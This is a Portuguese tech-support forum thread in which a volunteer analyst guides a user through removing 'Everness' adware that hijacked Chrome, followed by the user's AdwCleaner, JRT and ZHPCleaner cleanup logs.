Ir ao conteúdo
  • Comunicados

    • diego_moicano

      Gostaria de se tornar um analista em Remoção de Malware?   07-12-2015

      Gostaria de se tornar um analista em Remoção de Malware? O Fórum Clube do Hardware deu início a um programa de treinamento em análises de log. Os interessados deverão enviar um email para aprendizes (arroba) clubedohardware (ponto) com (ponto) br respondendo as seguintes perguntas: Por que você gostaria de aprender a analisar logs? Possui tempo hábil para o treinamento? Tem conhecimentos em informática? Se sim descreva-os. Possui inglês para leitura? Qual seu objetivo após completar o treinamento?   Não se esqueça de incluir no e-mail o seu nome de usuário (fornecer o link também), idade e cidade onde vive. Adicione também qualquer experiência e/ou razão sobre o porquê você seria um bom Analista. É digno de nota que apenas os que forem selecionados receberão resposta por MP (Mensagem Pessoal), não existe um padrão na escolha dos futuros aprendizes, todos os e-mails serão lidos e serão analisados de forma imparcial, portanto não será permitido reclamações neste aspecto. O treinamento é dado no próprio fórum. Quando um aprendiz é selecionado ele é movido para um novo grupo, onde terá acesso a fóruns fechados para os demais usuários onde poderá dar inicio ao seu treinamento. Importante: A cada 30 dias os e-mails não selecionados serão apagados, portanto você pode enviar um novo e-mail após 1 mês, e-mails enviados antes serão desconsiderados.  
    • Gabriel Torres

      Seja um moderador do Clube do Hardware!   12-02-2016

      Prezados membros do Clube do Hardware, Está aberto o processo de seleção de novos moderadores para diversos setores ou áreas do Clube do Hardware. Os requisitos são:   Pelo menos 500 posts e um ano de cadastro; Boa frequência de participação; Ser respeitoso, cordial e educado com os demais membros; Ter bom nível de português; Ter razoável conhecimento da área em que pretende atuar; Saber trabalhar em equipe (com os moderadores, coordenadores e administradores).   Os interessados deverão enviar uma mensagem privada para o usuário @Equipe Clube do Hardware com o título "Candidato a moderador". A mensagem deverá conter respostas às perguntas abaixo:   Qual o seu nome completo? Qual sua data de nascimento? Qual sua formação/profissão? Já atuou como moderador em algo outro fórum, se sim, qual? De forma sucinta, explique o porquê de querer ser moderador do fórum e conte-nos um pouco sobre você.   OBS: Não se trata de função remunerada. Todos que fazem parte do staff são voluntários.
Thiago Anjin

"Intruso" Everness modificando Google Chrome

Recommended Posts

Olá!

 

Há cerca de uma semana notei um comportamento estranho no meu notebook. Cada vez que tentava abrir o navegador, ele fechava abruptamente, até que, após aviso de "google chrome has crashed", o navegador reabriu. Atentei ao fato de o navegador não estar mais logado na minha conta Google, como de hábito, e também o fato de a página inicial ter mudado. Já estava bem suspeito. Ao tentar abrir o netflix, o servidor do site acusava que não havia um componente essencial para reprodução de vídeos. Fui atrás das causas possíveis (afinal um dia antes eu assistia netflix normalmente), e uma das causas que a ajuda do google sugeria era o Chrome não estar instalado. Ai minhas suspeitas estavam com bastante fatos baseados. Alguma coisa havia modificado ou removido o google.

 

Olhei o atalho do google e percebi que ele apontava para o caminho ""C:\Program Files (x86)\Everness\Application\chrome.exe"

 

Outro fato curioso: após dar a mensagem de erro no chrome, e abrir um Chrome 'modificado', surgiu na minha barra de tarefas um ícone do Firefox, também com página inicial modificada. Eu não instalei Firefox no meu notebook.

 

Após o ocorrido, tentei instalar antivírus (Avast) e removi o chrome modificado, e reinstalei o Chrome do site do google.

 

Ontem toda a descrição acima voltou a ocorrer. 

 

Segue o log ZA-Scan em anexo.

 


Grato desde já aos amigos pela ajuda!

 

Thiago.

 

ZA-Scan.txt

Compartilhar este post


Link para o post
Compartilhar em outros sites
diego_moicano    473

Caro @Thiago Anjin

 

Recomendo que salve este tópico em seus Favoritos para facilitar na hora de encontrá-lo.

 

Por favor, atente para o seguinte:

  • Caso fique sem resposta durante 3 dias, me envie uma Mensagem Privada (MP);
  • O que será passado aqui, somente será com relação ao problema do seu computador portanto, não faça mais em nenhum outro;
  • Siga, por favor, atentamente as instruções passadas e em caso de dúvidas não hesite em perguntá-las;
  • Sempre coloque suas respostas neste tópico... Não abra outro!
  • Procure sempre me manter informado, durante a remoção, sobre o que acontece com seu computador.
  • Respeite a ordem das instruções passadas.

Observação: Não tome outra medida além das passadas aqui; atente para que, caso peça ajuda em outro fórum, não deixe de nos informar, sob risco de desconfigurar seu computador!

 

# Etapa nº 1 #
 
Baixe o AdwCleaner e salve em sua Área de trabalho (Desktop)

Execute o arquivo adwcleaner.exe

 

Atenção: Usuários Windows Vista, 7 e 8, cliquem com o botão direito do mouse e escolha: execadmin.png 

  • Clique na aba Opções e deixe marcado apenas "Restaurar Políticas do IE" e "Restaurar Políticas do Chrome"
  • Clique no botão Verificar e aguarde o exame finalizar.
  • Clique no botão Limpar.
  • Abrirá um bloco de notas com o resultado.
  • Selecione, copie e cole o conteúdo deste log em sua sua próxima resposta.
  • O log também será salvo em C:\AdwCleaner


NOTA: Se o AdwCleaner encontrar arquivos que não consiga remover, poderá ter de reiniciar o PC. Faça isso imediatamente, ao ser perguntado se quer reiniciar.
 
# Etapa nº 2 #
 
Desative temporariamente seu antivirus, antispywares e firewall, para não causar conflitos.

Baixe o Junkware Removal Tool (JRT) e salve em sua Área de trabalho (Desktop)

 

Clique duas vezes para executar o jrt.exe.
 

Atenção: Usuários Windows Vista, 7 e 8, cliquem com o botão direito do mouse e escolha: execadmin.png 

  • A ferramenta começará o exame do seu sistema.
  • Tenha paciência pois pode demorar um pouco dependendo da quantidades de itens a examinar.
  • Ao final um log se abrirá. Será salvo no desktop com o nome de JRT.txt.
  • Selecione, copie e cole o conteúdo deste log em sua sua próxima resposta.

 
# Etapa nº 3 #
 
Desative temporariamente seu antivirus, antispywares e firewall, para não causar conflitos.

Faça o download do ZHPCleaner e salve em sua Área de trabalho (Desktop)

 

Atenção: Usuários Windows Vista, 7 e 8, cliquem com o botão direito do mouse e escolha: execadmin.png

  • Clique no botão Scanner.
  • A ferramenta começara o exame do seu sistema.
  • Tenha paciência pois pode demorar um pouco dependendo da quantidades de itens a examinar.
  • Em seguida clique no botão Reparar.
  • Será gerado um log chamado ZHPCleaner.txt
  • Selecione, copie e cole o conteúdo deste log em sua sua próxima resposta.

Abraços :D

Compartilhar este post


Link para o post
Compartilhar em outros sites
Thiago Anjin    0
  • Autor do tópico
  • Postado (editado)

    Olá, @diego_moicano!

     

    Peço desculpas pela demora na verificação do post, mas por alguma razão não fui notificado pelo e-mail, como na outra vez, então vou ficar mais atento!

     

    Vamos lá:

     

    # Etapa nº 1 #

    # AdwCleaner v6.046 - Relatório criado 12/05/2017 às 21:48:48
    # Atualizado em 24/04/2017 por Malwarebytes
    # Banco de dados : 2017-05-12.1 [Local]
    # Sistema operacional : Windows 10 Home  (X64)
    # Usuário : AnjiN - SEKIGAHARA
    # Executando de : C:\Users\AnjiN\Desktop\adwcleaner_6.046.exe
    # Modo: Limpo
    # Apoio : https://www.malwarebytes.com/support
    
    
    
    ***** [ Serviços ] *****
    
    [-] Serviço excluído:AppleCloudSvc
    
    
    ***** [ Pastas ] *****
    
    [-] Pasta excluída:C:\ProgramData\19e753ae-340a-4f38-a35c-1682cb28aff0
    [-] Pasta excluída:C:\ProgramData\250a46bf-d44c-4f80-9e0b-d4f3076b446e
    [-] Pasta excluída:C:\ProgramData\28aeb0ec-e73e-48ef-b8b5-800001d72cc9
    [-] Pasta excluída:C:\ProgramData\31a04406-e137-42f8-8acb-fa66ff5898aa
    [-] Pasta excluída:C:\ProgramData\5a36d4b1-2a89-4902-8024-cb31b5b7d658
    [-] Pasta excluída:C:\ProgramData\7445f030-c4fc-46d3-aad4-6523647a8818
    [-] Pasta excluída:C:\ProgramData\7dd305aa-b8f6-49c1-bc30-402bf34a7cb6
    [-] Pasta excluída:C:\ProgramData\7f503aa4-d3a9-4a56-a7c3-56ee8da0c72e
    [-] Pasta excluída:C:\ProgramData\84833fe0-c667-4adb-abdb-022b8e7856cd
    [-] Pasta excluída:C:\ProgramData\a16f8e46-bc1b-4385-8f32-a057c9ebe580
    [-] Pasta excluída:C:\ProgramData\da8ab457-c5ab-4b79-ad72-4f7b1edb4fc0
    [-] Pasta excluída:C:\ProgramData\e6e27b23-7ab1-486c-a02e-789f47c4bd66
    [-] Pasta excluída:C:\Users\AnjiN\AppData\Local\Everbean
    [-] Pasta excluída:C:\Users\AnjiN\AppData\Local\Everness
    [#] Pasta excluída na reinicialização:C:\Users\AnjiN\AppData\Roaming\Elex-tech
    [#] Pasta excluída na reinicialização:C:\Program Files (x86)\Elex-tech
    [-] Pasta excluída:C:\Program Files (x86)\Everness
    [#] Pasta excluída na reinicialização:C:\Program Files (x86)\Firefox
    [-] Pasta excluída:C:\Users\AnjiN\AppData\Roaming\Firefox
    [-] Pasta excluída:C:\Users\AnjiN\AppData\Local\Firefox
    
    
    ***** [ Arquivos ] *****
    
    [-] Arquivo excluído:C:\Users\AnjiN\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\ScreenShot.lnk
    [-] Arquivo excluído:C:\Windows\SysNative\log\iSafeKrnlCall.log
    [-] Arquivo excluído:C:\Windows\SysNative\drivers\iSafeKrnlBoot.sys
    [-] Arquivo excluído:C:\Windows\SysNative\drivers\iSafeNetFilter.sys
    [-] Arquivo excluído:C:\ProgramData\Microsoft\Windows\Start Menu\ScreenShot.lnk
    [-] Arquivo excluído:C:\Users\Public\Documents\temp.dat
    [-] Arquivo excluído:C:\Users\Public\Documents\report.dat
    
    
    ***** [ DLL ] *****
    
    
    
    ***** [ WMI ] *****
    
    
    
    ***** [ Atalhos ] *****
    
    
    
    ***** [ Atividades agendadas ] *****
    
    
    
    ***** [ Registro ] *****
    
    [-] Chave excluída:HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnl
    [#] Chave excluída na reinicialização:HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnlMon
    [-] Chave excluída:HKLM\SYSTEM\CurrentControlSet\services\iSafeService
    [-] Chave excluída:HKLM\SYSTEM\CurrentControlSet\services\isafekrnl
    [#] Chave excluída na reinicialização:HKLM\SYSTEM\CurrentControlSet\services\isafekrnlmon
    [-] Chave excluída:HKLM\SYSTEM\CurrentControlSet\services\isafeservice
    [-] Chave excluída:HKU\S-1-5-21-1706358801-989810220-3475375959-1001\Software\Conduit
    [-] Chave excluída:HKU\S-1-5-21-1706358801-989810220-3475375959-1001\Software\PRODUCTSETUP
    [-] Chave excluída:HKU\S-1-5-21-1706358801-989810220-3475375959-1001\Software\csastats
    [#] Chave excluída na reinicialização:HKCU\Software\Conduit
    [#] Chave excluída na reinicialização:HKCU\Software\PRODUCTSETUP
    [#] Chave excluída na reinicialização:HKCU\Software\csastats
    [-] Chave excluída:HKLM\SOFTWARE\Conduit
    [-] Chave excluída:HKLM\SOFTWARE\Elex-tech
    [-] Chave excluída:HKLM\SOFTWARE\ScreenShot
    [-] Chave excluída:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\iSafe
    [-] Chave excluída:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ScreenShot
    [#] Chave excluída na reinicialização:[x64] HKCU\Software\Conduit
    [#] Chave excluída na reinicialização:[x64] HKCU\Software\PRODUCTSETUP
    [#] Chave excluída na reinicialização:[x64] HKCU\Software\csastats
    [-] Chave excluída:HKCU\SOFTWARE\Classes\ChromeHTML
    [-] Chave excluída:HKCU\SOFTWARE\Clients\StartMenuInternet\ChromeHTML
    
    
    ***** [ Verificando navegadores ... ] *****
    
    [-] [C:\Users\AnjiN\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Eliminado:br.ask.com
    
    
    *************************
    
    :: Políticas do IE excluídas
    :: Políticas do Chrome excluídas
    
    *************************
    
    C:\AdwCleaner\AdwCleaner[C0].txt - [4445 Bytes] - [12/05/2017 21:48:48]
    C:\AdwCleaner\AdwCleaner[S0].txt - [4527 Bytes] - [12/05/2017 21:27:45]
    C:\AdwCleaner\AdwCleaner[S1].txt - [4426 Bytes] - [12/05/2017 21:30:26]
    C:\AdwCleaner\AdwCleaner[S2].txt - [4327 Bytes] - [12/05/2017 21:39:02]
    C:\AdwCleaner\AdwCleaner[S3].txt - [4400 Bytes] - [12/05/2017 21:40:44]
    
    ########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [4810 Bytes] ##########
    

     

    # Etapa nº 2 #

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Junkware Removal Tool (JRT) by Malwarebytes
    Version: 8.1.3 (04.10.2017)
    Operating System: Windows 10 Home x64 
    Ran by AnjiN (Administrator) on 12/05/2017 at 21:55:21,22
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    
    
    
    File System: 2 
    
    Failed to delete: C:\Program Files (x86)\elex-tech (Folder) 
    Successfully deleted: C:\Users\AnjiN\AppData\Roaming\elex-tech (Folder) 
    
    
    
    Registry: 1 
    
    Successfully deleted: HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnl (Registry Key) 
    
    
    
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Scan was completed on 12/05/2017 at 22:14:27,94
    End of JRT log
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    

     

     

    # Etapa nº 3 #

    ~ ZHPCleaner v2017.5.12.80 by Nicolas Coolman (2017/05/12)
    ~ Run by AnjiN (Administrator)  (12/05/2017 22:31:13)
    ~ Web: https://www.nicolascoolman.com
    ~ Blog: https://nicolascoolman.eu/
    ~ Facebook : https://www.facebook.com/nicolascoolman1
    ~ State version : Version KO
    ~ Type : Reparo
    ~ Report : C:\Users\AnjiN\Desktop\ZHPCleaner.txt
    ~ Quarantine : C:\Users\AnjiN\AppData\Roaming\ZHP\ZHPCleaner_Reg.txt
    ~ UAC : Activate
    ~ Boot Mode : Normal (Normal boot)
    Windows 10 Home, 64-bit  (Build 14393)
    
    
    ---\\  Serviços (0)
    
    
    ---\\  Navegadores de Internet (0)
    ~ Nenhum ítem malicioso o desnecessários foi encontrado.
    
    
    ---\\  Arquivo hosts (1)
    ~ O arquivo hosts é legítimo (21)
    
    
    ---\\  Tarefas automáticas agendadas. (0)
    ~ Nenhum ítem malicioso o desnecessários foi encontrado.
    
    
    ---\\  Explorer ( Arquivos, Pastas) (118)
    MOVIDO pasta: C:\Windows\Installer\wix{55BB2110-FB43-49B3-93F4-945A0CFB0A6C}.SchedServiceConfig.rmi    =>.Superfluous.Empty
    MOVIDO pasta: C:\Windows\Installer\wix{75FE588B-F158-4BB3-A283-A8D18E522A52}.SchedServiceConfig.rmi    =>.Superfluous.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\1fb8f7ad3e10install.rdf    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\4330eee4acf5install.rdf    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\ArmUI.ini    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\atcMRUList.idx    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\atc_DownloadsBackupMain.lst    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\badext.txt    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\CustomerSupport.JSON    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\databases.txt    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\DeleteOnReboot.bat    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\deployment.xml    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\driver.xml    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\iex64.reg    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\lilo26216    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\lilo36216    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\lilo46216    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\LocalStorage.txt    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\Microsoft .NET Framework 4 Setup_20170306_162652349.html    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\Microsoft .NET Framework 4.5.2 Setup_20170216_162422554.html    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\Microsoft Visual C++ 2010  x64 Redistributable Setup_20170216_165330105.html    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\Microsoft Visual C++ 2010  x86 Redistributable Setup_20170216_165219113.html    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\PCW8E49.xml    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\Pocket Calculator.ttf    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\result.xml    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.00D57B0F-01FA-B79F-08D6-878ED20C4C9B_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.0116DC02-781B-D1D1-FC1C-C80195511E17_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.0862A72D-A96C-83E5-AD0F-78B6AA06F9C6_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.0C8CF327-9D17-CCDE-18AF-DFF4F20070E5_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.18DDC675-D472-0DB4-9563-7DF7C34F512C_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.1FE89C0B-9BED-CC5D-7426-9E4025D6BDD9_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.3BFD26C9-8DA9-B940-F638-55890012AAB4_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.50611331-FE19-D366-B049-694B8AC9D758_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.557EA3BB-623E-ADD9-4DFB-629A8648A038_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.558F5D32-0827-EB7B-6AD6-D5DB4138B3AA_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.62B49C0A-499E-A02D-EBCB-EB168E148E52_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.664AA17A-2D25-0823-3315-3708FE16147A_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.674C4C14-7BAA-F782-E214-956DC3BEDF39_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.68BC3251-2D8B-A604-92BA-893638CA72EA_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.68E019EB-0B92-5E08-5D86-9BFE6DBA8517_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.69F3BCAB-8975-C526-30F5-39FA70C77AD9_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.6D151227-6BD9-726D-B30E-A8A018DCC82B_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.6EA6FC2E-9305-586B-3411-02826D151533_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.97612282-D1E8-1D6A-9E92-C271E7F177EF_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9D4DED89-CABC-F4FB-8133-BC5EDB1C7EDA_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9NBLGGH1ZRPV_0_0010_.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9NBLGGH1ZRPV_0__.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9NBLGGH2JHXJ_0_0011_.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9NBLGGH2JHXJ_0__.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9WZDNCRFHVFW_0_0010_.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9WZDNCRFHVFW_0__.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9WZDNCRFHW53_0_0010_.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9WZDNCRFHW53_0__.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9WZDNCRFJ140_0_0010_.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9WZDNCRFJ140_0__.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9WZDNCRFJ2WL_0_0010_.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9WZDNCRFJ2WL_0__.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9WZDNCRFJ3TJ_0_0010_.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9WZDNCRFJ3TJ_0__.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.A90B8400-D36D-8235-8BF2-A21A53D3FB65_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.AD2F1837.HPPrinterControl_v10z8vjag6ke6_1__.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.DFBE09D0-1F22-A9C0-2D3D-3F4C6351E58F_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.E336BB8F-16ED-7CBE-AFEE-971DD3041585_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.E6658C19-4221-2EBE-763A-F0493FBA2BB0_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.E6D3B497-80AF-7F14-F9E6-9606EE369FC3_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.FACF9DDE-1FF1-B57D-4D1D-CE479FDD42AF_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.Microsoft.XboxOneSmartGlass_8wekyb3d8bbwe_1__.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\switchtempartwork.jpg    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\tmp-fab.xpi    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\wct689.tmp    =>.Superfluous.Temporary.Various
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\web_connector_args_9328.txt    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{00E5C764-9525-44C3-8404-712AD06AE12A}background.png    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{0CB57D21-5E7C-4121-AD75-8ED4AE1B31C8}CS3_ribs_mastercollection.png    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{11439DFB-0658-42C7-926D-B66985857733}background.png    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{193F8A7B-1853-48D5-88AC-19446C2C1D13}estk_ribs_bgd.png    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{24D77A7C-E10B-4057-9974-FAB8BFDAC853}background.png    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{30C4B843-28DA-466F-AFCA-CB0ED153C826}background.png    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{3BC8460B-085E-47F3-9C62-8FFCBAF11D78}background.png    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{450CDEDE-2E5F-4659-AC0D-BA693424ACAF}background.png    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{49AB8F8D-74E1-41E3-8310-9C99C1C6C86D} - OProcSessId.dat    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{4D950C75-E85F-4A5F-94CE-2C99FE56063F}.png    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{4DAFF26A-62E5-4F2F-9E98-E73B914E6828}pr_ribs_bgd.png    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{5CF8D367-0897-4AE2-B872-8543DAC17F0D}ae_ribs_bgd.png    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{7BB7F66A-D798-45A3-A383-0727FB1EBF8E}background.png    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{7E3A1BF6-0A77-41B0-9CAC-ABD550F6F10D}application.sif    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{7E3A1BF6-0A77-41B0-9CAC-ABD550F6F10D}en_ribs_bgd.png    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{81178416-8292-46D1-953F-483DE5A9A68A}pr_ribs_bgd.png    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{9787B2D4-5394-4525-A290-47653B3181D9}background.png    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{AC76BA86-1033-0000-7760-000000000003}.ini    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{B2021C08-9CA3-4873-BBB9-B3904524CDFC}.png    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{BB996BAA-72E6-48AF-899A-57B760CC3E21}application.sif    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{BB996BAA-72E6-48AF-899A-57B760CC3E21}pr_ribs_bgd.png    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{C4519961-AC64-4565-B3AF-9050296B5D5A}ai_ribs_bgd.png    =>.Superfluous.Temporary.Empty
